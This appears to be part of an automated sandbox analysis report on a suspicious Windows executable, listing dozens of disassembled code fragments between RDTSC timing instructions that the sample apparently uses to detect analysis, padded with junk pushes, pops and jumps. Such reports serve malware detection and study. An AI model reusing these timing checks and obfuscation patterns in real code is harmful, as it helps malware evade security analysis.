              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 488587 second address: 48858B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489144 second address: 489162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F1Dh 0x00000007 jmp 00007F5E68E41F1Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489162 second address: 4891B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F5E6851342Fh 0x0000000c pushad 0x0000000d jbe 00007F5E68513426h 0x00000013 jp 00007F5E68513426h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b popad 0x0000001c popad 0x0000001d push edi 0x0000001e jno 00007F5E68513438h 0x00000024 pushad 0x00000025 jmp 00007F5E6851342Dh 0x0000002a push edx 0x0000002b pop edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4891B4 second address: 4891BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498790 second address: 4987AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F5E68513434h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C37B second address: 49C39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5E68E41F16h 0x0000000a jmp 00007F5E68E41F25h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C39F second address: 49C3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C3A3 second address: 49C3A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C3A7 second address: 49C3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C3AD second address: 49C3B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C3B3 second address: 49C3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C3B7 second address: 49C3BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C3BB second address: 49C3C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C3C1 second address: 49C3CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AEE15 second address: 4AEE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AEE1B second address: 4AEE21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AEE21 second address: 4AEE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F5E68513426h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AEE33 second address: 4AEE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AEE37 second address: 4AEE4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68513431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AEFDB second address: 4AEFEF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5E68E41F1Ah 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B08EC second address: 4B08F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C290B second address: 4C292E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5E68E41F1Fh 0x0000000d jns 00007F5E68E41F1Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7545 second address: 4C756C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F5E6851342Eh 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5E68513430h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C756C second address: 4C7574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C684F second address: 4C6853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6853 second address: 4C6859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6859 second address: 4C6866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6998 second address: 4C69AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F21h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7217 second address: 4C7243 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E68513437h 0x00000008 jmp 00007F5E68513430h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8D75 second address: 4C8D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F5E68E41F1Eh 0x0000000e jns 00007F5E68E41F1Ch 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8D97 second address: 4C8DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F5E68513426h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA737 second address: 4CA749 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E68E41F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F5E68E41F18h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD1EF second address: 4CD1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD1F6 second address: 4CD239 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5E68E41F2Eh 0x00000008 jmp 00007F5E68E41F28h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F5E68E41F2Eh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD239 second address: 4CD23F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD2C4 second address: 4CD2C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD2C8 second address: 4CD2CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD2CC second address: 4CD2F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dx, ax 0x0000000d push 00000004h 0x0000000f adc edx, 6755C085h 0x00000015 call 00007F5E68E41F19h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jns 00007F5E68E41F16h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD2F3 second address: 4CD33C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E68513426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jno 00007F5E68513426h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 jmp 00007F5E68513437h 0x0000001c jnl 00007F5E6851342Ch 0x00000022 popad 0x00000023 mov eax, dword ptr [esp+04h] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jnl 00007F5E68513426h 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD33C second address: 4CD342 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD342 second address: 4CD347 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD347 second address: 4CD37A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F5E68E41F28h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnl 00007F5E68E41F1Ch 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD37A second address: 4CD380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CEF9A second address: 4CEFC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F1Bh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c je 00007F5E68E41F1Ch 0x00000012 jne 00007F5E68E41F16h 0x00000018 jne 00007F5E68E41F1Eh 0x0000001e push esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CEFC9 second address: 4CEFCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E5FD2 second address: 3E5FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E5FD7 second address: 3E5FDC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E61D0 second address: 3E61D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40281 second address: 4B40285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40285 second address: 4B4028B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B4028B second address: 4B4029C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E6851342Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B4029C second address: 4B402A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B402A0 second address: 4B402BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E6851342Fh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B402BD second address: 4B402C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B402C3 second address: 4B402C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B402C9 second address: 4B4030C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e jmp 00007F5E68E41F20h 0x00000013 mov ecx, dword ptr [ebp+08h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5E68E41F27h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6066C second address: 4B60670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60670 second address: 4B6068D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6068D second address: 4B606AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68513431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, E03Eh 0x00000011 push ebx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B606AD second address: 4B606B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B606B3 second address: 4B606D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E6851342Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F5E6851342Bh 0x00000011 xchg eax, ecx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov esi, 65494911h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B606D8 second address: 4B606E3 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B606E3 second address: 4B6071B instructions: 0x00000000 rdtsc 0x00000002 mov edx, 6C49555Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movsx edx, ax 0x00000011 pushfd 0x00000012 jmp 00007F5E68513434h 0x00000017 or si, 0EC8h 0x0000001c jmp 00007F5E6851342Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6071B second address: 4B6075A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d mov ecx, 6C2030C3h 0x00000012 push eax 0x00000013 push edx 0x00000014 call 00007F5E68E41F26h 0x00000019 pop esi 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6075A second address: 4B6076A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 lea eax, dword ptr [ebp-04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6076A second address: 4B60770 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60770 second address: 4B60831 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E68513431h 0x00000009 xor ecx, 6C0CB2A6h 0x0000000f jmp 00007F5E68513431h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F5E68513430h 0x0000001b xor cl, 00000048h 0x0000001e jmp 00007F5E6851342Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 nop 0x00000028 jmp 00007F5E68513436h 0x0000002d push eax 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F5E68513431h 0x00000035 and ecx, 1D8F0416h 0x0000003b jmp 00007F5E68513431h 0x00000040 popfd 0x00000041 mov bl, cl 0x00000043 popad 0x00000044 nop 0x00000045 jmp 00007F5E68513433h 0x0000004a push dword ptr [ebp+08h] 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F5E68513430h 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60831 second address: 4B60837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60837 second address: 4B60848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E6851342Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60881 second address: 4B60885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60885 second address: 4B6088B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6088B second address: 4B60891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60891 second address: 4B60895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60895 second address: 4B60899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60899 second address: 4B608AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-04h], 00000000h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B608AA second address: 4B608AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B608AE second address: 4B608B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B608B2 second address: 4B608F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5E68E41F1Ch 0x0000000b popad 0x0000000c mov esi, eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F5E68E41F1Dh 0x00000017 sub ah, FFFFFFA6h 0x0000001a jmp 00007F5E68E41F21h 0x0000001f popfd 0x00000020 mov ch, B4h 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60950 second address: 4B60956 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60956 second address: 4B60967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E68E41F1Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60967 second address: 4B6098A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5E68513438h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6098A second address: 4B6099C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E68E41F1Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6011B second address: 4B6015E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E68513431h 0x00000009 or ah, 00000036h 0x0000000c jmp 00007F5E68513431h 0x00000011 popfd 0x00000012 mov ecx, 7EAE3E27h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a add dword ptr [esp], 69A0DA7Bh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov dx, 88CAh 0x00000028 push edx 0x00000029 pop ecx 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6015E second address: 4B601B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E68E41F1Ah 0x00000008 push esi 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr fs:[00000000h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F5E68E41F29h 0x0000001b pushfd 0x0000001c jmp 00007F5E68E41F20h 0x00000021 sbb ax, 7A18h 0x00000026 jmp 00007F5E68E41F1Bh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B601B5 second address: 4B601E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68513439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5E6851342Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B601E2 second address: 4B601E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B601E8 second address: 4B601EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B601EC second address: 4B601F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B601F0 second address: 4B60261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F5E68513434h 0x00000010 adc eax, 5751CE08h 0x00000016 jmp 00007F5E6851342Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F5E68513438h 0x00000022 sbb si, F068h 0x00000027 jmp 00007F5E6851342Bh 0x0000002c popfd 0x0000002d popad 0x0000002e nop 0x0000002f pushad 0x00000030 push esi 0x00000031 mov si, bx 0x00000034 pop edi 0x00000035 mov ax, FCF3h 0x00000039 popad 0x0000003a sub esp, 18h 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60261 second address: 4B60265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60265 second address: 4B60269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
